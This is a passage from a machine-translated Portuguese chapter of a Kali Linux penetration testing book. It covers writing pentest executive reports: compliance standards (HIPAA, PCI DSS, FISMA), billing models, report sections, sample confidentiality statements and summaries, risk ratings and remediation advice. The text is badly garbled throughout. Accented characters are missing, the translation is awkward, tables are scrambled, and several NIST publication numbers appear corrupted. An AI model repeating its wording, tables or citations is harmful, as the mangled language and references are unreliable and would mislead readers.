e sendo fs de Boston Legal, no somos Denny Crane. Recomendamos quando voc
levar a srio sobre o desenvolvimento de escopos, contratos e relatrios, voc procura profissional
ajuda legal.
Os engenheiros de rede instalao de redes, programadores criar aplicaes e auditores
escrever. Como um verificador da penetrao da rede, voc est, por padro, um auditor. Ao contrrio
de um
rede engenheiro que ir configurar protocolos de roteamento, ou um programador que vai
criar um aplicativo, o seu valor ser baseado em sua escrita. Em outras palavras, aprender
como escrever. No uma cincia e arte associada com a escrita. Se voc est tentando
encontrar um estilo consistente, os autores deste livro recomendam A Modern Language
Association of America Style, ou melhor conhecido como MLA. MLA um fcil de usar
estilo de escrita, usado pela maioria das escolas de ensino mdio como um padro de escrita. H.
Ramsey Fowler
e Jane E. Aaron guia de referncia, com o ttulo A Little, Brown Handbook, um excelente
guia de referncia sobre como usar corretamente estilos MLA quando escreve. Como Penetrao
Tester, e, finalmente, como um auditor, o valor que voc fornecer sero julgados em como
suas concluses so apresentadas. A razo nmero um relatrios de teste de penetrao falhar
m gramtica ou ortografia. O nmero dois motivo de fluxo ou estilos ilgico. Que
por isso que altamente recomendvel ter o seu relatrio revisado com indivduos no
relacionado com o seu projeto para fornecer uma perspectiva outsider. Isto pode incluir ter
colaboradores que no so tcnicos.
Penetration Test Relatrio Executivo
Como voc apresentar resultados ser o fator mais influente e determinante
para futuros negcios. Uma vez que voc se familiarizar com um estilo de escrita, h mais
estilos e fluxos adequados associados com auditorias tcnicas. Isto inclui a indstria
normas que vm de organizaes especficas PCI e outro setor, como
COBIT eo ITIL. Em ltima anlise, o tema de seu relatrio seguir o aceite
padres de governana corporativa para a organizao que voc est auditando. Alm disso,
mantenha
em mente que um relatrio penetrao ser visto por muitas pessoas, e referiu-se por um
perodo mais longo de tempo do que voc provavelmente pretendia.
Os clientes querem saber como eles so vulnerveis, e os requisitos para corrigir falhas
para que eles reduzam o risco global de segurana contra ataques. Formatao e tom de
um relatrio pode causar uma reao positiva ou negativa aos dados. Os trabalhos podem ser
rescindido
por ter sido ligado a uma vulnerabilidade. Em contrrio, uma lacuna crtica na segurana poderia ser
ignorado se a linguagem de um relatrio no corretamente destacar como essencial uma correo
necessrio. Os melhores prestadores de servios pode equilibrar as competncias tcnicas e de
negcios
no desenvolvimento de relatrios executivos para que o resultado final ter um impacto positivo
liderana e equipe tcnica.
Um bom ponto de partida olhar para o que os regulamentos, normas e mandatos so
importante para o seu cliente. Misturando os requisitos do cliente solicitado com a indstria
mandatos o primeiro tpico deste captulo. Em seguida, vamos olhar para o servio diferente
modelos utilizados para cobrar por servios de entrega. Depois disso, vamos nos concentrar em
diferentes
tipos de documentos, formatao de relatrios executivos para que voc possa deixar o bom
engajamento ps impresso servio. Este captulo ser concludo com alguns exemplos
relatrios e cobrir as ferramentas de relatrios restantes disponveis em Kali Linux.
Observncia
Os clientes tm oramentos limitados e, normalmente, a segurana no um gasto superior
objetivo em relao a compra pr-ativa. Em nossa experincia, os clientes gastaro
dinheiro em outras reas de tecnologia at que algo ruim acontece causando reativa
gastos. Torna-se ainda mais desafiador para oferecer servios que avaliam existente
segurana, como um teste de penetrao quando muitos clientes tm problemas suficientes
manuteno da engrenagem existente, bem como manter-se com a mais recente tecnologia. Um
simples
analogia quando a maioria das pessoas compra um laptop, eles olham para o software para instalar
para a funcionalidade em vez de defesa (ou seja, a compra de Microsoft Word, em vez
do que um antivrus). Quando esse mesmo laptop infectado, os usurios parar de pensar
software sobre funcional e priorizar a obteno de software de segurana para remover o
aplicativo malicioso.
[278]
Captulo 8
Um mtodo para elevar os seus servios para o topo da lista de prioridade de compra
alinhando com mandatos de negcios. Os clientes so mais propensos a comprar servios
cumprimento das obrigaes empresariais, tornando a conversa investimento mais fcil de justificar.
Muitos mandatos do setor tm graves repercusses para no auditorias que vo
de multas a terminao do trabalho. Alinhando suas entregas com as normas obrigatrias
uma opo forte para justificar a aquisio de seus servios.
Termos que so importantes em relao ao cumprimento da indstria so as seguintes:
As linhas de base: Eles so usados para criar um nvel mnimo de segurana necessrio
atender s exigncias polticas. As linhas de base pode ser configuraes, arquiteturas, ou
procedimentos que podem ou no refletem o processo de negcio, mas pode ser
adaptado para atender a essas exigncias. Voc pode usar linhas de base como uma
abstrao
para desenvolver padres.
Padres: So requisitos obrigatrios que suportam de nvel superior
polticas. Um padro pode exigir a utilizao de uma tecnologia especfica incluindo
marca, produto e protocolo. Um exemplo a criao de um padro para 802.1x
usando o Cisco Identity Services Engine a partir de uma linha de base de ter que ter uma
forma
automatizado de controle de acesso.
Diretrizes: So recomendaes em vez do que o necessrio. Considerar
diretrizes semelhantes s normas, no entanto, nada obriga as pessoas a seguir
los. Um exemplo o controle que portas abrir em um firewall, em vez de
usando a permitir que todos regra de trfego.


Os padres da indstria

H muitos padres importantes da indstria que seus clientes esto mandatados para
seguir. A lista a seguir comumente usado para justificar a aquisio de financiamento para
produtos e servios:
Seguro de Sade Portabilidade e Accountability Act (HIPAA): Requer
que controles adequados so postas em prtica para garantir as operaes de cuidados de
sade
e sistemas de informao administrativos proteger individualmente identificveis
informaes de sade eletrnico. H um baixo risco de multas associadas a
HIPAA no conformidade, no entanto, os riscos colaterais significativos, como
responsabilidade civil e marca dano pode resultar de no cumprir HIPPA
requisitos.
Federal Information Processing Standards (FIPS): So computadores nos EUA
normas de segurana desenvolvidas para proteger a informao transmitida por
agncias governamentais e prestadores de servios.

[279]
Penetration Test Relatrio Executivo
Lei de Gesto de Segurana da Informao Federal (FISMA) / Nacional
Instituto de Padres e Tecnologia (NIST): A FISMA e NIST especial
800-153 e 800-137 publicaes fornecer um quadro abrangente para
garantir a eficcia dos controles de segurana da informao sobre os recursos
que suportam as operaes e ativos federais.
North American Electric Reliability Corporao (NERC): Desenvolveu
obrigatrio Proteco das Infra- (CIP), normas de segurana ciberntica
para proteger os cibernticos ativos essenciais que controlam ou afetam a confiabilidade do
Sistemas eltricos em massa norte-americano. Aprovado pelo Energia Federal
Comisso Reguladora (FERC), o cumprimento destes padres
obrigatrio para todas as organizaes envolvidas com a granel do pas eltrica
rede.
Payment Card Industry Data Security Standard (PCI DSS) e Pagamento
Aplicao de Segurana de Dados Padro (PA-DSS): Estas so as normas para
organizaes que lidam com informaes do titular do carto para o dbito principal, de
crdito,
pr-pago, e-bolsa, ATM e cartes de POS.
Lei Sarbanes-Oxley (SOX): Ele exige reformas rigorosas para melhorar financeiro
divulgaes de empresas e evitar a fraude contbil.



Servios profissionais
As estratgias mais comuns para cobrar os clientes para os servios so Turnkey e hora e
Relevante. Turnkey, todos os servios tm um custo conjunto que s pode ajustar se os servios
so solicitados fora do acordado escopo do trabalho. Normalmente, modificaes para um
Engajamento Turnkey exigem um pedido separado para a mudana que o cliente deve
aceitar antes da incluso cobrana adicional.
Servios Turnkey colocar o risco de perder a rentabilidade do fornecedor de servios, porque
custo no ajusta independentemente da quantidade de trabalho necessria para atender o escopo
de
trabalho. Isto significa que o prestador de servios tem a oportunidade de executar tarefas sob
tempo proposto igualando lucro adicional. Isso tambm poderia sair pela culatra quando os servios
exceder o custo do trabalho. por isso que absolutamente essencial para definir um realizveis
escopo de trabalho para os servios propostos, com algumas horas de preenchimento adicionais
utilizados para
incidentes imprevistos.
[280]
Captulo 8
Os clientes tendem a inclinar-se para servios chave na mo com base na capacidade de planejar
para os custos esperados. Os clientes podem concentrar-se em atingir os resultados esperados da
servios solicitados e prestadores de servios espera quando responsvel tarefas no so
completou, sem incorrer em custos de trabalho adicionais. Grandes organizaes, como os EUA
governo federal so conhecidos por solicitar servios Turnkey em formais Pedidos
para saber o Preo (RFP) postagens pblicas. Na maioria das situaes, h orientaes escritas
pelo escritrio de compras para determinar quem ser concedido o engajamento baseado
de fatores como melhor valor, preo e itens de reunio necessrio. Vimos RFPs
sair pela culatra quando o escritrio de compras seleciona servios baseados exclusivamente em
melhor preo. Em
Nalguns casos, os servios de maus causar mais problemas do custo e vrias vezes mais altas
para remediar do que a oferta de melhor valor anterior. Para ajudar os clientes a evitar este
situao, recomendamos trabalhar com os clientes sobre como solicitar condies especficas
e condies que apenas candidatos qualificados poderiam se encontrar, para forar um equilbrio de
melhor
valor e custo como uma mtrica de premiao.
O outro mtodo comum de servios de faturamento tempo e materiais. Tempo e
Propostas Materiais cobrar por horas de utilizao. Normalmente, os prestadores de servios ir
listar
diferentes preos por hora para as categorias de faturamento, tais como Gerente de Projetos
pode ser 100
dlares por hora, mas um engenheiro snior de 200 dlares por hora. comum que
servios a serem divididos em ordens de servio com horas esperados para ajudar o cliente
preparar-se para os encargos previstos, o projeto continua.
Time and Materials coloca o risco de servios de alto custo para o cliente, porque
servios que superem as ordens de servio continuam a ser cobrado. O benefcio para os clientes
eles podem ser capazes de gastar menos, se eles podem possuir parte do trabalho, bem como evitar
a
horas de enchimento extras comuns acusados de uma proposta Turnkey. A desvantagem para
clientes o prestador de servios no incentivado a terminar o projeto e poderia
atrasar a concluso.
Como um profissional prestador de servios, recomenda-se a apontar para o desenvolvimento de
um
Servios Turnkey oferta como voc construir uma prtica. Prticas bem definidos pode definir
expectativas adequadas com clientes para evitar nos servios de escopo esperado. No nosso
experincia, os clientes no tm tales de cheques em branco para os servios, e desejo um
conjunto
custar antes de solicitar para o oramento.
Periodicamente, os clientes podem solicitar para substituir membros faturveis com a sua
pessoal para reduzir o custo total do projeto. Por exemplo, um cliente pode pedir para
usar um gerente de projeto interno para o planejamento. Este introduz o risco de
no gerir adequadamente os recursos, o que poderia levar a problemas e causa
horas excessivas que vai comer fora em lucros esperados. Recomendamos
evitar estas situaes, porque difcil de controlar um membro da equipe
que no diretamente parte de sua organizao.
[281]
Penetration Test Relatrio Executivo
Documentao
O desenvolvimento de um produto final pode ser dividida em alguns estgios, tal como mostrado no
seguinte
diagrama. O primeiro estgio o Projeto de Reviso. Este o lugar onde o prestador de servios
comentrios
a declarao de trabalho, objetivos de negcio do cliente, reas de interesse, e props
valor para fornecer. Tudo isso mais o material identificado adicional usado para construir um
modelo de relatrio.
O prximo passo o preenchimento do modelo de relatrio durante a fase de Coleta de Informaes.
A informao capturada inclui dispositivos identificados, processos utilizados, vulnerabilidades
encontrado, verificao de vulnerabilidades, sugeriu remediao, e outros dados.
Uma vez que todos os dados so capturados e alinhado com o modelo, a terceira fase a preparao
um primeiro esboo. Este projecto no ser voltado para clientes e conter o mximo de dados
possvel. ltima a fase de reviso, usada para emagrecer o relatrio com os dados mais forte
juntamente com o ajuste para atender s demandas de negcios de uma forma profissional. Melhores
prticas
est a ter tanto um escritor de edio tcnica e profissional do projecto para se certificar de que
endereos tanto necessidades de pessoal tcnico e executivo.
Projeto
Reviso
Informaes
Coleo
Primeira Verso
Comente e
finalizao
Um escopo de trabalho deve sempre contabilizar horas necessrias para criar
documentao. Normalmente 60 por cento do tempo relatrio escrita ser
utilizado para o projecto, e reviso de documentos e assinar projeto ir utilizar o
restantes horas. Certifique-se de calcular o ciclo de vida do documento em sua
cronograma do projeto, para evitar perda de receita.
Formato do relatrio
Independentemente do tipo de projeto, h alguns itens que devem ser includos
em servios de documentos de resultado final. Todos os documentos devem explicar o seu
propsito,
anunciar a sua marca, identificar as partes envolvidas, o trabalho lista que foi realizada, e
Concluo com um resultado esperado. Esta seo ir fornecer algumas dicas e
exemplos para o cumprimento das metas de formatao de uma forma profissional.
[282]
Captulo 8
Capa
A pgina de rosto em um mnimo ir fornecer um nome de relatrio, verso, data, autor, servio
nome do fornecedor, eo partido pretendia. As folhas de rosto tambm pode listar os itens adicionais,
tais
como a classificao de segurana de documentos ou de destaque os resultados de outras sees.
Declarao de Confidencialidade
As informaes obtidas durante a maioria dos servios de penetrao ser
sensvel. fundamental para identificar o nvel de segurana esperado para proteger informaes
capturados durante o trabalho, bem como o nome que permitido para ver como
dados. Certos nveis de folga pode exigir tratamento especial ou em locais protegidos
para o armazenamento, tais como um Sensitive Information Facility Compartmented (SCIF) para
armazenamento de material classificado. Violaes de privacidade de dados pode ter financeira,
marca e
repercusses legais.
Uma declarao de confidencialidade deve explicar qual o nvel de segurana est envolvido com
o documento, que est autorizado a v-lo, o que eo que no permitido
ser copiado, os direitos de distribuio, e outra linguagem jurdica. Recomendamos que voc tenha
um indivduo com um fundo legal desenvolver a sua confidencialidade padro
Declarao.
Exemplo 1: Declarao de Confidencialidade
Este documento contm informaes confidenciais e privilegiadas do servio
FORNECEDOR. A informao destinado para uso privado do cliente para a sua
compreenso do estado atual da segurana da sua organizao. Ao aceitar
Neste documento, O CLIENTE concorda em manter o contedo deste documento em
confiana e no copiar, divulgar, ou distribu-lo para todas as partes, excepto os
que ir fornecer servios e / ou produtos diretamente aos clientes, como resultado de
as recomendaes deste documento, sem pedido por escrito para e por escrito
confirmao do servio de provedor. Se voc no for o destinatrio pretendido, ser
ciente de que qualquer divulgao, cpia ou distribuio deste documento ou de suas partes
proibida.
Exemplo 2: Declarao de Confidencialidade
Esta informao confidencial est sendo fornecido ao PRESTADOR DE SERVIOS como
entrega deste trabalho de consultoria. O nico propsito deste documento
fornecer ao cliente com os resultados e recomendaes deste compromisso.
Cada destinatrio concorda que eles vo seguir as restries de distribuio de acordo com a
o acordo entre este agente consultoria e prestador de servios.
[283]
Penetration Test Relatrio Executivo
Controle de documentos
importante listar qual a verso e edies so feitas a uma proposta de entrega.
Provavelmente, muitas pessoas com uma variedade de conjuntos de habilidades ir rever um
documento.
Mudanas de rotulagem com as datas e tipo de modificao vai ajudar os leitores alavancar o
verses mais recentes.
Histria do Documento
Verso
1
2
3
Data
5/1/13
5/24/13
Autor (es)
Josh Wink
Jeff Mills
Comentrios
Criado
Revisado
Revisado
5/10/13 Mark Farina
Timeline
Timelines fornecer uma estimativa de horas para cada fase de um projeto. Timelines deve
incluir o nome de fase, tarefas a serem concludas, e durao prevista para essa fase.
Normalmente, a durao exibido em horas faturveis para que o cliente pode estimar o
custo para cada fase do projeto. Recomenda-se a incluir a lngua para a qual
fases so obrigatrias para evitar pedidos para remover as fases crticas, como o projeto
kickoff.
Veja a seguir um cronograma estimado e plano de implementao de alto nvel:
Rrovider Servio comear este compromisso de iniciar duas semanas depois de receber o
assinado declarao de trabalho (SOW), e da ordem de compra do cliente sujeita a recurso
disponibilidade. Se o cliente solicita um compromisso data de incio acelerado, este deve
ser negociado com Provedor de Servios, Gerenciamento de Projetos, e conta Team.
As fases de apresentao da fase de lanamento do projeto e remediao so fases obrigatrias
para todas as outras fases.
[284]
Captulo 8
Fase Engagement
Projeto Kickoff Meeting
Tarefa (nvel alto)
Demonstrao do trabalho de reviso.
Configurao Deliverable. Negcio
e Q tcnico + A, Boundry reviso.
Pr-requists
Ferramenta de preparao e instalao.
Footprinting, reviso de polticas,
mapeamento.
Digitalizar para dispositivo. Reviso existente
infra-estrutura de rede
Durao Estimada
8 Horas
Avaliao de Rede
16 Horas
32 Horas
Teste de Invaso Sistema que pode ser identificar
explorados e executar teste caneta sobre
sistemas de destino.
Anlise de relatrios, recomendaes
e apresentaes
32 Horas
16 Horas
6 Horas
2 Horas
Remediao Apresentao Constatao atual e impacto de segurana
anlise, incluindo recomendaes
Projeto fechar
Resumo executivo
O objetivo de um relatrio executivo fornecer uma viso geral de alto nvel de servios por que
Foram realizados. Os resumos executivos deve cobrir o que o levou at a questo ser
abordados, a situao problemtica, e proposta de soluo com resultados esperados.
Relatrios executivos no exigem detalhes tcnicos e devem visar a liderana, em vez
de pessoal tcnico.
Exemplo 1: Sumrio Executivo
Background:
CLIENTE envolvidos PRESTADOR DE SERVIOS para realizar uma avaliao de vulnerabilidade
e teste de penetrao de seus sistemas. A finalidade do acoplamento foi avaliar o
segurana das redes e sistemas de clientes, identificando possveis falhas de segurana
neles, utilizando comprovada metodologia de testes SERVIO do provedor. O projeto
foi realizada em um nmero de sistemas em segmentos de rede do cliente, um
equipe de especialistas do provedor de servio durante a data de admisso.
[285]
Penetration Test Relatrio Executivo
Este projeto incluiu testes de penetrao de nove (9) os hosts internos. Para o teste,
PRESTADOR DE SERVIOS focada no seguinte:
Tente determinar o que as vulnerabilidades de nvel de sistema poderia ser descoberto
e explorados sem o conhecimento prvio do ambiente ou notificao ao
administradores.
Tentar explorar vulnerabilidades encontradas e acesso a informao confidencial
que podem ser armazenados em sistemas.
Documentos e relatrio sobre todos os achados.


Todos os testes levaram em considerao os processos de negcios reais implementadas pelo
sistemas e suas ameaas em potencial e, portanto, os resultados desta avaliao refletem uma
imagem realista dos nveis reais de exposio a hackers online.
Este documento contm os resultados dessa avaliao.
Informaes sobre o projeto:
O principal objetivo desta avaliao foi o de fornecer uma anlise de segurana
falhas presentes em redes e sistemas do cliente. Esta avaliao
foi realizado para identificar possveis vulnerabilidades e fornecer acionvel
recomendaes sobre remediar as vulnerabilidades para fornecer uma maior
nvel de segurana para o meio ambiente.
PRESTADOR DE SERVIOS usado sua metodologia Teste de Invaso provado
avaliar a segurana dos sistemas e identificar potenciais falhas de segurana.
Exemplo 2: Sumrio Executivo
PRESTADOR DE SERVIOS AO CLIENTE empenhado para realizar uma penetrao da rede
Teste em um nmero quantificado de sistemas em sua rede. Estes sistemas foram
identificados pelos nmeros de host 192.168.1.x, 10.1.1.x, e 172.16.1.X. A finalidade
desse compromisso foi o de identificar e priorizar as vulnerabilidades de segurana no
sistemas identificados. O engajamento foi lanada em [START DATE] e incluiu
quatro (4) dias de testes, anlise e documentao.
Metodologia
altamente recomendvel para fornecer uma viso geral de como voc entregar servios.
Destaques deve incluir o seu processo para cada fase de um noivado, ferramentas
usado, e como voc lida com as ameaas identificadas. comum para desenvolver diagramas
apresentando fluxo de processos e estruturas de relatrios de recursos para esta seo.
[286]
Captulo 8
As certificaes podem ajudar a mostrar a capacidade de um provedor de servios para proporcionar
qualidade
resultados. Existem certificaes que destacam a capacidade da empresa de seguir comprovada
metodologia de fluxo de negcios, tais como a Organizao Internacional para
Normas certificaes (ISO) (Por exemplo, ISO 9001 ou 14001). Outras certificaes
poderia ser focado em uma tecnologia especfica, como tendo engenheiros certificados para
instalar a tecnologia que est sendo solicitado. Certificaes de testes de penetrao so Popular
o Certified Ethical Hacker (CEH) e GIAC Penetration Tester (GPEN), que
ajudar a qualificar os recursos que esto sendo contratados.
Por Exemplo: Metodologia
PRESTADOR DE SERVIOS usado personalizado e ferramentas disponveis publicamente para
ganhar perspectiva de
postura de segurana da rede do ponto de vista de um hacker. Estes mtodos proporcionam
CLIENTE com uma compreenso dos riscos que ameaam a sua informao, e
tambm os pontos fortes e fracos de seus controles atuais protegendo esses sistemas.
Os resultados foram alcanados e exigido pelo perfil de redes internas CLIENTE
usando informaes publicamente disponveis, o mapeamento da arquitetura de rede, identificando
hosts e servios, rede enumerando e vulnerabilidades de nvel de sistema,
descobrindo anfitries inesperados dentro do ambiente e eliminando falso
positivos que pode ter surgido a partir de digitalizao.
DISCOVERY
Avaliar e
Educar
Alvos de mapeamento
Remediar
Teste de Invaso
Metodologia
AVALIAO
Lockdown
Alvos
SEGURO
Alvos da Auditoria
[287]
Penetration Test Relatrio Executivo
Procedimentos de teste detalhadas
Esta seo aborda detalhes do envolvimento de servios. O pblico-alvo
Normalmente o pessoal tcnico, eo objetivo fornecer o mximo de informaes
possveis reas de preocupao em torno identificados. Os clientes podem querer desafiar um
item realado e repita os passos utilizados para validar a vulnerabilidade, ou seja,
eles querem saber como as coisas so descobertas, acessados e explorados. Estes dados
tambm verifica todas as reas de rede solicitados rotulados no mbito do trabalho ter sido
enviada pelo prestador de servio.
Normalmente, os assuntos a serem includos so alvos descoberta, mapeamento, a vulnerabilidade
avaliao, anlise da arquitetura, explorando, e relatrios. At que ponto um servio
provedor vai em qualquer rea baseada no que a declarao de trabalho define como o foco
do noivado.
Por exemplo,
PRESTADOR DE SERVIOS foi capaz de acessar o host legado EMR usando o padro
credenciais de administrador do sistema para MS SQL. Esse acesso nos permitiu criar um
conta de administrador, expor os processos do sistema, contas de usurio, arquivos de banco de
dados e
permitir a transferncia e execuo de arquivos. Um invasor com este nvel de acesso seria
ser capaz de interromper todos os processos de negcios que dependem desse host.
PRESTADOR DE SERVIOS tambm foi capaz de usar o Server Message Block (SMB) Null
Conta de usurio para enumerar os nomes de contas de usurios e grupos do nome de domnio
Server (DNS). Um invasor pode usar esta informao para ataques de phishing direcionados
sobre os trabalhadores do cliente ou para conduzir ataques de adivinhao de senhas fora bruta.
Um atacante que ganha credenciais administrativas com sucesso para criar outro usurio
contas e atribu-los a atingir as funes corporativas poderia usar informaes de usurios.
No geral, os resultados identificar ameaas que podem ser mitigados atravs de dispositivo simples
/
definies de configurao de software, juntamente com polticas de apoio.
A avaliao da vulnerabilidade e testes de penetrao resumo:
CLIENTE desde PRESTADOR DE SERVIOS com os oito (8) endereos IP so listadas
na tabela a seguir. Esta gama foi digitalizada para determinar as portas e servios abertos
execuo nos hosts relacionados.
[288]
Captulo 8
Endereo IP
192.168.10.20
192.168.10.23
Hostname
SERV001
SERV542
Portas TCP
42,53,88,135,139,445,464,53,636,1025,1
071,1075,1145
135,139,445,1433,3300
135,139,445,1433,3389
80,135,139,445,1443
135,139,445,1433,1434,3372,3389,5022,
8400,8402
135,139,445,1433,1434,3372,3389,5022,
8400,8402
80443
80
192.168.10.154 SERV239
192.168.10.204 SERV777
172.18.10.100
172.18.10.101
172.18.10.105
172.18.10.200
SERVSQL123
SERVSQL124
database.intern.com
corp.com
Resumo dos resultados
O Resumo das concluses a carne por trs da proposta. Este o lugar onde os resultados
dos servios so explicados, incluindo a forma como os itens identificados podem impactar negcios.
Como estes resultados so formatados vai determinar a reao do seu cliente, por isso no
consciente de no s o que dito, mas tambm a forma como os dados so apresentados.
A melhor prtica , incluindo uma classificao de risco para ajudar os clientes a entender como reagir
aos itens identificados. Caractersticas de classificao comum a probabilidade, avaliao do risco,
grficos, esquemas de cores e assim por diante. Recomendamos incluindo tanto um grfico de resumo
e seo detalhada sobre todos os itens identificados individualmente. Para fazer backup de suas
descobertas,
melhor prtica ter referncias a fontes pblicas sobre por que o ativo identificado tem uma
questo para validar ainda mais a sua reivindicao. As fontes pblicas poderia ser violaes em
conformidade,
no encontrando um padro mandatada ou explicao de uma vulnerabilidade conhecida de um
fonte respeitvel.
Exemplo:




Crtico: Ameaa imediata para os processos-chave de negcios
Alta: Ameaa indireta a chave processos de negcio / ameaa de secundrio
processos de negcios
Meio: Indireta ameaa / parcial aos processos de negcio
Baixa: No existe nenhuma ameaa direta; vulnerabilidade pode ser alavanca com
outro
vulnerabilidades
[289]
Penetration Test Relatrio Executivo
O nvel de risco atual de sistemas testados, com base no nvel de risco mais elevado dos resultados
obtidos em
sistemas crtico durante o ensaio, um total de um (1) Crtico, dois (2) Mdio, e
dois (2) Baixo vulnerabilidades foram identificadas como mostrado na imagem seguinte:
Vulnerabilidade
Vulnerabilidade A
Vulnerabilidade B
Vulnerabilidade C
Vulnerabilidade D
Vulnerabilidade E
Gravidade
Crtico
Mdio
Mdio
Baixo
Baixo
Mesa de vero para os resultados da avaliao
Digitalizao TypeTotal
Hosts
Portas
9
TCP UDP 1-65535,
Gravidade da Vulnerabilidade
Crtico
Mdio
Baixo
Total
1 (nico: 1)
2 (singular: 2)
2 (singular: 2)
nico definida como o nmero de diferentes vulnerabilidades encontrado
dentro de um nvel de risco. Por exemplo, se cinco vulnerabilidades de alto nvel foram
encontrado, mas trs so original, do que algumas das vulnerabilidades so
apresentar em mais de um sistema.
Vulnerabilidades
Vulnerabilidades encontradas deve incluir uma descrio clara sobre a origem do
fraqueza, impacto nas operaes de negcios e probabilidade de ser explorado. Relatrios
tambm deve listar como a vulnerabilidade foi identificada juntamente com, se ele foi validado,
significado foi a vulnerabilidade explorada ou apenas identificada como uma possvel vulnerabilidade
durante uma verificao. Vulnerabilidades na arquitetura de um cliente pode incluir um diagrama
explicando o problema com o fluxo de trfego capturado que os clientes possam qualificar o
recomendao.
Alguns detalhes que poderiam ser includos para vulnerabilidades identificadas em um relatrio de
entrega
so como se segue:



Nome Vulnerabilidade
Criticidade do negcio
Descrio Vulnerabilidade
[290]
Captulo 8




Detalhes tcnicos
Os sistemas afetados
Portas afetadas
Ao recomendada
[291]
Penetration Test Relatrio Executivo
Pode haver concluses gerais que voc gostaria de incluir alm vulnervel
sistemas para mostrar valor adicional. Por exemplo, existe uma ordem que toda EUA
agncias federais tm equipamentos capazes de suportar IPv6. No tendo este no
necessariamente uma vulnerabilidade, no entanto, algo que um cliente federal dos EUA seria
interessado em saber. Outro exemplo seria apoiar as futuras tecnologias,
tais como capacidades para Voz sobre IP (VoIP) e vdeo.
A seguir est uma lista de sugestes de itens para incluir em servios de Teste de Penetrao de
mostrar o valor adicional:









Diferena em configuraes de arranque e de funcionamento para
dispositivos
Desvio Melhores prticas
Suporte para IPv6
Fim de venda ou de final de dispositivos de
vida
O suporte para as capacidades necessrias para VoIP e vdeo
Conformidade com normas comuns, como FISMA, PCI
Lista de nmeros de srie, endereo IP, MAC, e assim por diante de dispositivos
encontrados
Topologia de rede
Protocolos disponveis e dos dados virado pblico
Consideraes de rede e de
recomendaes
Esta seo explica as recomendaes para remediar itens encontrados de servios
fornecida. Recomendaes podem variar de sugestes de alto nvel, como "remendo
este sistema ", a passos muito detalhados para fechar uma vulnerabilidade. Algumas medidas de
remediao
poderia afetar outros servios, como fechar as portas para defender de um ataque especfico,
que tambm incapacita outro sistema que utiliza esse canal para comunicao. Ele
importante incluir advertncias de possveis impactos negativos com qualquer sugeriram
remediao, juntamente com a confirmao de que os passos previstos no garantem para corrigir o
problema ou trazer um sistema em conformidade com a regulamentao especfica. A ltima coisa
voc iria querer um cliente que est sendo comprometida servios de correios e ponto culpa
em voc por no fornecer etapas de correo de sucesso para uma vulnerabilidade identificada
durante seus servios.
[292]
Captulo 8
muito importante afirmar em um relatrio que garante entrega
ou coberturas esto includos os servios de correios. Os clientes que no conseguem
uma auditoria
pode assumir os seus servios anteriores so responsveis se voc no indicar seu
servios, no garantem reunio mandatos ou necessidades especficas.
Por exemplo, existe uma grande diferena entre ter um relatrio PCI
includo com servios, em comparao com a contratao de um especialista na verdade
PCI
na reviso de todos os aspectos do regulamento com a rede do cliente,
em um mtodo semelhante ao utilizado pelos auditores.
H muitos nveis de remediao. Por vezes, como a rede de arquitectura
expe uma fraqueza, mas outras vezes uma lacuna na poltica, configurao ou
remendo faltando. Os itens a incluir, por recomendaes so resumo das concluses,
de alto nvel e detalhadas recomendaes para remediao, outros dados teis
fora de itens solicitados, tais como as capacidades de IPv6, mudanas no projeto da rede,
recomendaes de hardware, software, patches e resumo cumprimento.
Exemplo:
Louvamos ao cliente para ser pr-ativo na gesto de risco de tecnologia e
segurana da rede por meio de aquisio de nossos servios. Devido ao impacto da geral
organizao como descoberto por este teste de penetrao, os recursos adequados
recomendado para ser alocada para assegurar que os esforos de reparao so efectuadas
em tempo hbil. Apesar de uma lista abrangente de itens que devem estar
implementado est fora do mbito do presente compromisso, alguns itens de alto nvel so
importante mencionar.
Implementar um programa de gerenciamento de patch: Muitas das vulnerabilidades
identificadas
poderiam ser evitados com o gerenciamento de patches adequada. Recomendamos seguinte
as orientaes descritas no NIST SP 800-408 como uma fonte para o desenvolvimento de
polticas de segurana para gerenciamento de patches adequada. Isto ir reduzir o risco de
execuo de sistemas vulnerveis.
Impor controle de mudanas em todos os sistemas: As vulnerabilidades comuns so
causado por erro humano. Muitos problemas de configurao incorreta poderia ser
evitado
atravs de uma mudana forte e processo de controlo em todos os sistemas activos
Multifatorial Alavancagem e controle de acesso baseado em funo: Alguns sistemas
crticos
Foram encontrados alavancando a segurana da senha como os nicos meios de validar
pessoas autorizadas. A melhor prtica ter, pelo menos, duas formas de
autenticao, juntamente com a limitao do acesso conta de administrao.
Restringir o acesso a sistemas crticos: Sistemas crticos devem ser isolados a partir de
outros sistemas usando listas brancas, ACLs, VLANs e outros meios. O projeto
conceito de privilgio mnimo vai limitar a quantidade de dano que um atacante pode
provocado usando um recurso comprometida. Consulte NIST SP 800-27 RevA11 para
orientaes sobre a obteno de uma linha de base de segurana para sistemas de TI.
[293]



Penetration Test Relatrio Executivo
Realizar avaliaes de vulnerabilidade regulares: As avaliaes de vulnerabilidade
deve ser realizado numa base regular, como um meio para validar o actual
estado de risco para a organizao. Consulte NIST SP 800-309 para obter orientaes
sobre
funcionamento de um programa eficaz de gesto de risco.
Incluir alta disponibilidade para sistemas crticos e redes: Durante a nossa
avaliao, encontramos pontos nicos de falha para sistemas de misso crtica.
A melhor prtica o desenvolvimento de opes de failover em caso de falha na rede.
Um exemplo para um melhor trfego para o datacenter do ncleo a adio de
sistemas redundantes para a rede de centros de dados, como mostrado abaixo.
Adicionais de Alta Disponibilidade Equipamento
VRRP
Interruptor
Servidores NAT
Firewall
VRRP

Data Center
Interruptor
Servidores
VRRP
NAT
Firewall
VRRP
Apndices
Exemplo:
Um listas anexas informaes adicionais relacionadas com o relatrio entrega tipicamente
no essencial para as principais concluses. Isto para fins de referncia e pode conter
resultados da verificao, screenshots capturados, e outras informaes.
Apndice 001 - Relatrios de varredura de vulnerabilidades Nessus
<Captured Nessus Relatrio Printout>
Glossrio
Um glossrio usado para definir o significado dos termos utilizados na proposta. Isso poderia
ser para definies tcnicas, especificando os requisitos atrs conformidade referenciados
termos, ou outras reas que podem precisar de mais esclarecimentos.
[294]
Captulo 8
Declarao de Trabalho (SOW)
Antes de oferecer servios de penetrao, pode ser necessrio escrever uma Declarao de Trabalho
(SOW) que descreve o trabalho que voc est indo para executar. Este normalmente o primeiro
passo
voc gostaria de completar com seus stakeholders antes de iniciar um projeto.
Ao escrever um SOW, recomendamos que voc siga um formato que acabar
representar a sua estrutura de comunicao. O formato bsico de uma Declarao de
Trabalho
documentos incluem o seguinte:
Relatrio Executivo: Um resumo de alto nvel do trabalho que voc est fazendo, o que
